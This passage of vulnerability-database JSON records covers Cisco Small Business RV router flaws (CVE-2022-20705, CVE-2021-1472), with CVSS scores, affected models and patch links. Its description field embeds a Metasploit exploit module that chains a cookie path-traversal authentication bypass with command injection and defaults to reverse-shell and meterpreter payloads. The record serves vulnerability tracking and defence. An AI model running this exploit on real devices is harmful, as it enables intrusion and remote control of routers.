                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "ZDI",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "id": "CVE-2022-20705",
                "impactScore": 3.6,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 0.7,
                "userInteraction": "NONE",
                "vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "ZDI",
                "id": "CVE-2022-20705",
                "trust": 1.4,
                "value": "HIGH"
              },
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20705",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2022-20705",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20705",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "ZDI",
                "id": "CVE-2022-20705",
                "trust": 0.7,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202202-166",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-20705",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: execute arbitrary code; elevate privileges; execute arbitrary commands; bypass authentication and authorization protections; fetch and run unsigned software; cause denial of service (DoS). For more information about these vulnerabilities, see the Details section of this advisory. Multiple Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the configuration of the NGINX web server. When parsing the sessionid cookie, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to bypass authentication on the system. \n          This access can then be used to pivot to other parts of the network. This module works on firmware\n          versions 1.0.03.24 and below. 
\n        },\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027Platform\u0027 =\u003e [\u0027linux\u0027, \u0027unix\u0027],\n        \u0027Author\u0027 =\u003e [\n          \u0027Biem Pham\u0027,  # Vulnerability Discoveries\n          \u0027Neterum\u0027,    # Metasploit Module\n          \u0027jbaines-r7\u0027  # Inspired from cisco_rv_series_authbypass_and_rce.rb\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-11-02\u0027,\n        \u0027Arch\u0027 =\u003e [ARCH_CMD, ARCH_ARMLE],\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272022-20705\u0027], # Authentication Bypass\n          [\u0027CVE\u0027, \u00272022-20707\u0027], # Command Injection\n          [\u0027ZDI\u0027, \u002722-410\u0027], # Authentication Bypass\n          [\u0027ZDI\u0027, \u002722-411\u0027]  # Command Injection\n        ],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027Unix Command\u0027,\n            {\n              \u0027Platform\u0027 =\u003e \u0027unix\u0027,\n              \u0027Arch\u0027 =\u003e ARCH_CMD,\n              \u0027Type\u0027 =\u003e :unix_cmd,\n              \u0027Payload\u0027 =\u003e {\n                \u0027BadChars\u0027 =\u003e \u0027\\\u0027#\u0027\n              },\n              \u0027DefaultOptions\u0027 =\u003e {\n                \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat\u0027\n              }\n            }\n          ],\n          [\n            \u0027Linux Dropper\u0027,\n            {\n              \u0027Platform\u0027 =\u003e \u0027linux\u0027,\n              \u0027Arch\u0027 =\u003e [ARCH_ARMLE],\n              \u0027Type\u0027 =\u003e :linux_dropper,\n              \u0027Payload\u0027 =\u003e {\n                \u0027BadChars\u0027 =\u003e \u0027\\\u0027#\u0027\n              },\n              \u0027CmdStagerFlavor\u0027 =\u003e [ \u0027wget\u0027, \u0027curl\u0027 ],\n              \u0027DefaultOptions\u0027 =\u003e {\n                
\u0027PAYLOAD\u0027 =\u003e \u0027linux/armle/meterpreter/reverse_tcp\u0027\n              }\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027RPORT\u0027 =\u003e 443,\n          \u0027SSL\u0027 =\u003e true,\n          \u0027MeterpreterTryToFork\u0027 =\u003e true\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [CRASH_SAFE],\n          \u0027Reliability\u0027 =\u003e [REPEATABLE_SESSION],\n          \u0027SideEffects\u0027 =\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n        }\n      )\n    )\n    register_options(\n      [\n        OptString.new(\u0027TARGETURI\u0027, [true, \u0027Base path\u0027, \u0027/\u0027])\n      ]\n    )\n  end\n\n  # sessionid utilized later needs to be set to length\n  # of 16 or exploit will fail. Tested with lengths\n  # 14-17\n  def generate_session_id\n    return Rex::Text.rand_text_alphanumeric(16)\n  end\n\n  def check\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/upload\u0027,\n      \u0027headers\u0027 =\u003e {\n        \u0027Cookie\u0027 =\u003e \u0027sessionid =../../www/index.html; sessionid=\u0027 + generate_session_id\n      }\n    }, 10)\n\n    # A proper \"upload\" will trigger file creation. So the send_request_cgi call\n    # above is an incorrect \"upload\" call to avoid creating a file on disk. The router will return\n    # status code 405 Not Allowed if authentication has been bypassed by the above request. \n    # The firmware containing this authentication bypass also contains the command injection\n    # vulnerability that will be abused during actual exploitation. Non-vulnerable\n    # firmware versions will respond with 403 Forbidden. 
\n    if res.nil?\n      return CheckCode::Unknown(\u0027The device did not respond to request packet.\u0027)\n    elsif res.code == 405\n      return CheckCode::Appears(\u0027The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.\u0027)\n    elsif res.code == 403\n      return CheckCode::Safe(\u0027The device is not vulnerable to exploitation.\u0027)\n    else # Catch-all\n      return CheckCode::Unknown(\u0027The target responded in an unexpected way. Exploitation is unlikely.\u0027)\n    end\n  end\n\n  def execute_command(cmd, _opts = {})\n    res = send_exploit(cmd)\n\n    # Successful unix_cmd shells should not produce a response. \n    # However if a response is returned, check the status code and return\n    # Failure::NotVulnerable if it is 403 Forbidden. \n    if target[\u0027Type\u0027] == :unix_cmd \u0026\u0026 res\u0026.code == 403\n      fail_with(Failure::NotVulnerable, \u0027The target responded with 403 Forbidden and is not vulnerable\u0027)\n    end\n\n    if target[\u0027Type\u0027] == :linux_dropper\n      fail_with(Failure::Unreachable, \u0027The target did not respond\u0027) unless res\n      fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a 200 OK\u0027) unless res\u0026.code == 200\n      begin\n        body_json = res.get_json_document\n        fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a JSON body\u0027) unless body_json\n      rescue JSON::ParserError =\u003e e\n        print_error(\"Failed: #{e.class} - #{e.message}\")\n        fail_with(Failure::UnexpectedReply, \u0027Failed to parse the response returned from the server! 
Its possible the response may not be JSON!\u0027)\n      end\n    end\n\n    print_good(\u0027Exploit successfully executed.\u0027)\n  end\n\n  def send_exploit(cmd)\n    filename = Rex::Text.rand_text_alphanumeric(5..12)\n    fileparam = Rex::Text.rand_text_alphanumeric(5..12)\n    input = Rex::Text.rand_text_alphanumeric(5..12)\n\n    # sessionid utilized later needs to be set to length\n    # of 16 or exploit will fail. Tested with lengths\n    # 14-17\n    sessionid = Rex::Text.rand_text_alphanumeric(16)\n\n    filepath = \u0027/tmp/upload.input\u0027 # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues. \n    pathparam = \u0027Configuration\u0027\n\n    destination = \"\u0027; \" + cmd + \u0027 #\u0027\n\n    multipart_form = Rex::MIME::Message.new\n    multipart_form.add_part(filepath, nil, nil, \u0027form-data; name=\"file.path\"\u0027)\n    multipart_form.add_part(filename, nil, nil, \u0027form-data; name=\"filename\"\u0027)\n    multipart_form.add_part(pathparam, nil, nil, \u0027form-data; name=\"pathparam\"\u0027)\n    multipart_form.add_part(fileparam, nil, nil, \u0027form-data; name=\"fileparam\"\u0027)\n    multipart_form.add_part(destination, nil, nil, \u0027form-data; name=\"destination\"\u0027)\n    multipart_form.add_part(input, \u0027application/octet-stream\u0027, nil, format(\u0027form-data; name=\"input\"; filename=\"%\u003cfilename\u003es\"\u0027, filename: filename))\n\n    # Escaping \"/tmp/upload/\" folder that does not contain any other permanent files\n    send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e \u0027/upload\u0027,\n      \u0027ctype\u0027 =\u003e \"multipart/form-data; boundary=#{multipart_form.bound}\",\n      \u0027headers\u0027 =\u003e {\n        \u0027Cookie\u0027 =\u003e \u0027sessionid =../../www/index.html; sessionid=\u0027 + sessionid\n      },\n      \u0027data\u0027 =\u003e multipart_form.to_s\n    }, 10)\n  
end\n\n  def exploit\n    print_status(\"Executing #{target.name} for #{datastore[\u0027PAYLOAD\u0027]}\")\n    case target[\u0027Type\u0027]\n    when :unix_cmd\n      execute_command(payload.encoded)\n    when :linux_dropper\n      execute_cmdstager(linemax: 120)\n    end\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "db": "PACKETSTORM",
            "id": "170988"
          }
        ],
        "trust": 3.69
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20705",
            "trust": 5.5
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-415",
            "trust": 2.4
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410",
            "trust": 2.4
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409",
            "trust": 2.4
          },
          {
            "db": "PACKETSTORM",
            "id": "170988",
            "trust": 1.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15848",
            "trust": 0.7
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15882",
            "trust": 0.7
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15610",
            "trust": 0.7
          },
          {
            "db": "CS-HELP",
            "id": "SB2022020301",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20705",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "PACKETSTORM",
            "id": "170988"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "id": "VAR-202202-0325",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2024-11-23T22:04:59.212000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Cisco has issued an update to correct this vulnerability.",
            "trust": 2.1,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "cisco-sa-smb-mult-vuln-KA9PK6D",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco Small Business Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=182405"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "https://github.com/20142995/Goby",
            "trust": 0.1,
            "url": "https://github.com/20142995/Goby "
          },
          {
            "title": "Goby_POC\nPOC \u6570\u91cf1319",
            "trust": 0.1,
            "url": "https://github.com/Z0fhack/Goby_POC "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-23305 "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-RCE "
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-787",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.8,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
          },
          {
            "trust": 2.3,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-415/"
          },
          {
            "trust": 1.8,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-410/"
          },
          {
            "trust": 1.8,
            "url": "http://packetstormsecurity.com/files/170988/cisco-rv-series-authentication-bypass-command-injection.html"
          },
          {
            "trust": 1.7,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-409/"
          },
          {
            "trust": 1.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20705"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022020301"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv340_lan/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20707"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "PACKETSTORM",
            "id": "170988"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "PACKETSTORM",
            "id": "170988"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "date": "2022-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "date": "2023-04-12T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "date": "2023-02-14T15:32:53",
            "db": "PACKETSTORM",
            "id": "170988"
          },
          {
            "date": "2022-02-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          },
          {
            "date": "2022-02-10T18:15:09.307000",
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "date": "2023-04-12T07:15:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "date": "2023-02-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          },
          {
            "date": "2024-11-21T06:43:22.260000",
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 series router \u00a0 Out-of-bounds write vulnerability in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0893

    Vulnerability from variot - Updated: 2024-11-23 21:58

    Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0893",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv260p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.03"
          },
          {
            "model": "rv160",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.03"
          },
          {
            "model": "rv340",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.21"
          },
          {
            "model": "rv340w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.21"
          },
          {
            "model": "rv160w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.03"
          },
          {
            "model": "rv260w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.03"
          },
          {
            "model": "rv345p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.21"
          },
          {
            "model": "rv345",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.21"
          },
          {
            "model": "rv260",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.03"
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "T Shiomitsu",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-1472",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2021-1472",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2021-1472",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "NONE",
                "baseScore": 5.3,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "id": "CVE-2021-1472",
                "impactScore": 1.4,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
